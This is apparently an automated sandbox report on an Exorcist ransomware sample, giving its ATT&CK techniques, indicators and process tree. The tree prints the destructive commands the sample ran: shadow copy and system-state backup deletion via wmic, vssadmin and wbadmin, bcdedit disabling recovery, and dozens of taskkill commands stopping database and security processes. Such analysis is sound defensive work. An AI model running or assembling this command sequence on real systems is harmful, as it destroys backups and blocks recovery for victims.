exorcist | d7d0688022b5848caf5cbabc1bde628cb74f32e014311f5299ed63241fff72b0

Exorcist Ransomware
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1576 bcdedit.exe
1536 bcdedit.exe
Deletes System State backups 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

1924 wbadmin.exe
1760 wbadmin.exe

pid	process
1576	bcdedit.exe
1536	bcdedit.exe

pid	process
1924	wbadmin.exe
1760	wbadmin.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CloseRequest.tiff => C:\Users\Admin\Pictures\CloseRequest.tiff.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InstallRegister.tiff.giDfJo	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CloseRequest.tiff	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CloseRequest.tiff.giDfJo	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\GroupInvoke.crw => C:\Users\Admin\Pictures\GroupInvoke.crw.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\GroupInvoke.crw.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InstallRegister.tiff	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\InstallRegister.tiff => C:\Users\Admin\Pictures\InstallRegister.tiff.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SplitUnlock.tif.giDfJo	build-x64-crypt.bin.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1304 cmd.exe

pid	process
1304	cmd.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File opened (read-only)	\??\B:	build-x64-crypt.bin.exe
File opened (read-only)	\??\F:	build-x64-crypt.bin.exe
File opened (read-only)	\??\G:	build-x64-crypt.bin.exe
File opened (read-only)	\??\M:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Q:	build-x64-crypt.bin.exe
File opened (read-only)	\??\R:	build-x64-crypt.bin.exe
File opened (read-only)	\??\V:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Z:	build-x64-crypt.bin.exe
File opened (read-only)	\??\H:	build-x64-crypt.bin.exe
File opened (read-only)	\??\L:	build-x64-crypt.bin.exe
File opened (read-only)	\??\T:	build-x64-crypt.bin.exe
File opened (read-only)	\??\A:	build-x64-crypt.bin.exe
File opened (read-only)	\??\K:	build-x64-crypt.bin.exe
File opened (read-only)	\??\N:	build-x64-crypt.bin.exe
File opened (read-only)	\??\O:	build-x64-crypt.bin.exe
File opened (read-only)	\??\S:	build-x64-crypt.bin.exe
File opened (read-only)	\??\W:	build-x64-crypt.bin.exe
File opened (read-only)	\??\X:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Y:	build-x64-crypt.bin.exe
File opened (read-only)	\??\E:	build-x64-crypt.bin.exe
File opened (read-only)	\??\I:	build-x64-crypt.bin.exe
File opened (read-only)	\??\J:	build-x64-crypt.bin.exe
File opened (read-only)	\??\P:	build-x64-crypt.bin.exe
File opened (read-only)	\??\U:	build-x64-crypt.bin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

build-x64-crypt.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	build-x64-crypt.bin.exe

Drops file in Windows directory 6 IoCs

Processes:

wbadmin.exewbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

208 timeout.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1980 vssadmin.exe

pid	process
208	timeout.exe

pid	process
1980	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1624	taskkill.exe
880	taskkill.exe
1984	taskkill.exe
1500	taskkill.exe
1864	taskkill.exe
1516	taskkill.exe
232	taskkill.exe
1928	taskkill.exe
1924	taskkill.exe
1432	taskkill.exe
600	taskkill.exe
576	taskkill.exe
1088	taskkill.exe
1088	taskkill.exe
1976	taskkill.exe
2012	taskkill.exe
1388	taskkill.exe
1968	taskkill.exe
1480	taskkill.exe
1096	taskkill.exe
1416	taskkill.exe
1080	taskkill.exe
520	taskkill.exe
520	taskkill.exe
1824	taskkill.exe
1048	taskkill.exe
1860	taskkill.exe
1976	taskkill.exe
1556	taskkill.exe
2040	taskkill.exe
2032	taskkill.exe
1876	taskkill.exe
1480	taskkill.exe
564	taskkill.exe
1388	taskkill.exe
1560	taskkill.exe
1076	taskkill.exe
208	taskkill.exe
1952	taskkill.exe
1756	taskkill.exe
1704	taskkill.exe
480	taskkill.exe
1804	taskkill.exe
1468	taskkill.exe
1532	taskkill.exe
1964	taskkill.exe
1896	taskkill.exe
2028	taskkill.exe
1096	taskkill.exe
1080	taskkill.exe
1848	taskkill.exe
216	taskkill.exe
1620	taskkill.exe
1760	taskkill.exe
1568	taskkill.exe
340	taskkill.exe
1904	taskkill.exe
1888	taskkill.exe
1936	taskkill.exe
1496	taskkill.exe
1520	taskkill.exe
1464	taskkill.exe
1884	taskkill.exe
208	taskkill.exe

NTFS ADS 5 IoCs

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro	build-x64-crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

build-x64-crypt.bin.exe

pid	process
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1616	WMIC.exe
Token: SeSecurityPrivilege	1616	WMIC.exe
Token: SeTakeOwnershipPrivilege	1616	WMIC.exe
Token: SeLoadDriverPrivilege	1616	WMIC.exe
Token: SeSystemProfilePrivilege	1616	WMIC.exe
Token: SeSystemtimePrivilege	1616	WMIC.exe
Token: SeProfSingleProcessPrivilege	1616	WMIC.exe
Token: SeIncBasePriorityPrivilege	1616	WMIC.exe
Token: SeCreatePagefilePrivilege	1616	WMIC.exe
Token: SeBackupPrivilege	1616	WMIC.exe
Token: SeRestorePrivilege	1616	WMIC.exe
Token: SeShutdownPrivilege	1616	WMIC.exe
Token: SeDebugPrivilege	1616	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1616	WMIC.exe
Token: SeRemoteShutdownPrivilege	1616	WMIC.exe
Token: SeUndockPrivilege	1616	WMIC.exe
Token: SeManageVolumePrivilege	1616	WMIC.exe
Token: 33	1616	WMIC.exe
Token: 34	1616	WMIC.exe
Token: 35	1616	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1616	WMIC.exe
Token: SeSecurityPrivilege	1616	WMIC.exe
Token: SeTakeOwnershipPrivilege	1616	WMIC.exe
Token: SeLoadDriverPrivilege	1616	WMIC.exe
Token: SeSystemProfilePrivilege	1616	WMIC.exe
Token: SeSystemtimePrivilege	1616	WMIC.exe
Token: SeProfSingleProcessPrivilege	1616	WMIC.exe
Token: SeIncBasePriorityPrivilege	1616	WMIC.exe
Token: SeCreatePagefilePrivilege	1616	WMIC.exe
Token: SeBackupPrivilege	1616	WMIC.exe
Token: SeRestorePrivilege	1616	WMIC.exe
Token: SeShutdownPrivilege	1616	WMIC.exe
Token: SeDebugPrivilege	1616	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1616	WMIC.exe
Token: SeRemoteShutdownPrivilege	1616	WMIC.exe
Token: SeUndockPrivilege	1616	WMIC.exe
Token: SeManageVolumePrivilege	1616	WMIC.exe
Token: 33	1616	WMIC.exe
Token: 34	1616	WMIC.exe
Token: 35	1616	WMIC.exe
Token: SeBackupPrivilege	1784	vssvc.exe
Token: SeRestorePrivilege	1784	vssvc.exe
Token: SeAuditPrivilege	1784	vssvc.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1304	taskkill.exe
Token: SeDebugPrivilege	216	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	1860	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

build-x64-crypt.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 284 wrote to memory of 748	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 748	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 748	284	build-x64-crypt.bin.exe	cmd.exe
PID 748 wrote to memory of 1616	748	cmd.exe	WMIC.exe
PID 748 wrote to memory of 1616	748	cmd.exe	WMIC.exe
PID 748 wrote to memory of 1616	748	cmd.exe	WMIC.exe
PID 284 wrote to memory of 1900	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1900	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1900	284	build-x64-crypt.bin.exe	cmd.exe
PID 1900 wrote to memory of 1924	1900	cmd.exe	wbadmin.exe
PID 1900 wrote to memory of 1924	1900	cmd.exe	wbadmin.exe
PID 1900 wrote to memory of 1924	1900	cmd.exe	wbadmin.exe
PID 284 wrote to memory of 1768	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1768	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1768	284	build-x64-crypt.bin.exe	cmd.exe
PID 1768 wrote to memory of 1760	1768	cmd.exe	wbadmin.exe
PID 1768 wrote to memory of 1760	1768	cmd.exe	wbadmin.exe
PID 1768 wrote to memory of 1760	1768	cmd.exe	wbadmin.exe
PID 284 wrote to memory of 1600	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1600	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1600	284	build-x64-crypt.bin.exe	cmd.exe
PID 1600 wrote to memory of 1576	1600	cmd.exe	bcdedit.exe
PID 1600 wrote to memory of 1576	1600	cmd.exe	bcdedit.exe
PID 1600 wrote to memory of 1576	1600	cmd.exe	bcdedit.exe
PID 284 wrote to memory of 1604	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1604	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1604	284	build-x64-crypt.bin.exe	cmd.exe
PID 1604 wrote to memory of 1536	1604	cmd.exe	bcdedit.exe
PID 1604 wrote to memory of 1536	1604	cmd.exe	bcdedit.exe
PID 1604 wrote to memory of 1536	1604	cmd.exe	bcdedit.exe
PID 284 wrote to memory of 1976	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1976	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1976	284	build-x64-crypt.bin.exe	cmd.exe
PID 1976 wrote to memory of 1980	1976	cmd.exe	vssadmin.exe
PID 1976 wrote to memory of 1980	1976	cmd.exe	vssadmin.exe
PID 1976 wrote to memory of 1980	1976	cmd.exe	vssadmin.exe
PID 284 wrote to memory of 2020	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 2020	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 2020	284	build-x64-crypt.bin.exe	cmd.exe
PID 2020 wrote to memory of 1028	2020	cmd.exe	VSSVC.exe
PID 2020 wrote to memory of 1028	2020	cmd.exe	VSSVC.exe
PID 2020 wrote to memory of 1028	2020	cmd.exe	VSSVC.exe
PID 284 wrote to memory of 2032	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 2032	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 2032	284	build-x64-crypt.bin.exe	cmd.exe
PID 2032 wrote to memory of 1496	2032	cmd.exe	taskkill.exe
PID 2032 wrote to memory of 1496	2032	cmd.exe	taskkill.exe
PID 2032 wrote to memory of 1496	2032	cmd.exe	taskkill.exe
PID 284 wrote to memory of 1400	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1400	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1400	284	build-x64-crypt.bin.exe	cmd.exe
PID 1400 wrote to memory of 1584	1400	cmd.exe	taskkill.exe
PID 1400 wrote to memory of 1584	1400	cmd.exe	taskkill.exe
PID 1400 wrote to memory of 1584	1400	cmd.exe	taskkill.exe
PID 284 wrote to memory of 1100	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1100	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1100	284	build-x64-crypt.bin.exe	cmd.exe
PID 1100 wrote to memory of 520	1100	cmd.exe	taskkill.exe
PID 1100 wrote to memory of 520	1100	cmd.exe	taskkill.exe
PID 1100 wrote to memory of 520	1100	cmd.exe	taskkill.exe
PID 284 wrote to memory of 1844	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1844	284	build-x64-crypt.bin.exe	cmd.exe
PID 284 wrote to memory of 1844	284	build-x64-crypt.bin.exe	cmd.exe
PID 1844 wrote to memory of 1304	1844	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:284

C:\Windows\system32\cmd.exe
cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
2⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe SHADOWCOPY DELETE /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1924

C:\Windows\system32\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
2⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1760

C:\Windows\system32\cmd.exe
cmd /C bcdedit.exe /set {default} recoveryenabled No
2⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:1576

C:\Windows\system32\cmd.exe
cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:1536

C:\Windows\system32\cmd.exe
cmd /C vssadmin.exe Delete Shadows /All /Quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1980

C:\Windows\system32\cmd.exe
cmd /C C:\Windows\system32\vssvc.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\VSSVC.exe
C:\Windows\system32\vssvc.exe
3⤵
PID:1028

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wxServer*
2⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wxServer*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBFCService*
2⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBFCService*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBVSS*
2⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBVSS*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sql*
2⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sql*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM msaccess*
2⤵
PID:1144

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msaccess*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM mssql*
2⤵
PID:1072

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mssql*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:600

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM mysql*
2⤵
PID:1928

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mysql*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wxServerView*
2⤵
PID:1752

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wxServerView*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlmangr*
2⤵
PID:1556

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlmangr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM RAgui*
2⤵
PID:2040

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RAgui*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM supervise*
2⤵
PID:2036

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM supervise*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1048

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Culture*
2⤵
PID:1432

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Culture*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Defwatch*
2⤵
PID:1448

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Defwatch*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM winword*
2⤵
PID:764

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM winword*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBW32*
2⤵
PID:1292

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBW32*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgr*
2⤵
PID:220

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBDBMgr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM qbupdate*
2⤵
PID:748

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM qbupdate*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM axlbridge*
2⤵
PID:1912

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM axlbridge*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM httpd*
2⤵
PID:1564

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM httpd*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fdlauncher*
2⤵
PID:1604

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fdlauncher*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MsDtSrvr*
2⤵
PID:1592

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MsDtSrvr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:480

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM java*
2⤵
PID:832

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM java*
3⤵
- Kills process with taskkill
PID:2028

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM 360se*
2⤵
PID:308

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM 360se*
3⤵
- Kills process with taskkill
PID:1500

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM 360doctor*
2⤵
PID:268

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM 360doctor*
3⤵
- Kills process with taskkill
PID:1804

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wdswfsafe*
2⤵
PID:880

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wdswfsafe*
3⤵
- Kills process with taskkill
PID:1864

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fdhost*
2⤵
PID:208

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fdhost*
3⤵
- Kills process with taskkill
PID:1888

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM GDscan*
2⤵
PID:1076

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM GDscan*
3⤵
- Kills process with taskkill
PID:1516

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ZhuDongFangYu*
2⤵
PID:1896

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ZhuDongFangYu*
3⤵
- Kills process with taskkill
PID:1936

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgrN*
2⤵
PID:1764

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBDBMgrN*
3⤵
- Kills process with taskkill
PID:1760

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM mysqld*
2⤵
PID:1540

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mysqld*
3⤵
- Kills process with taskkill
PID:1624

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM AutodeskDesktopApp*
2⤵
PID:1988

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AutodeskDesktopApp*
3⤵
PID:1972

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM acwebbrowser*
2⤵
PID:2020

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM acwebbrowser*
3⤵
PID:1028

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Creative Cloud*
2⤵
PID:1452

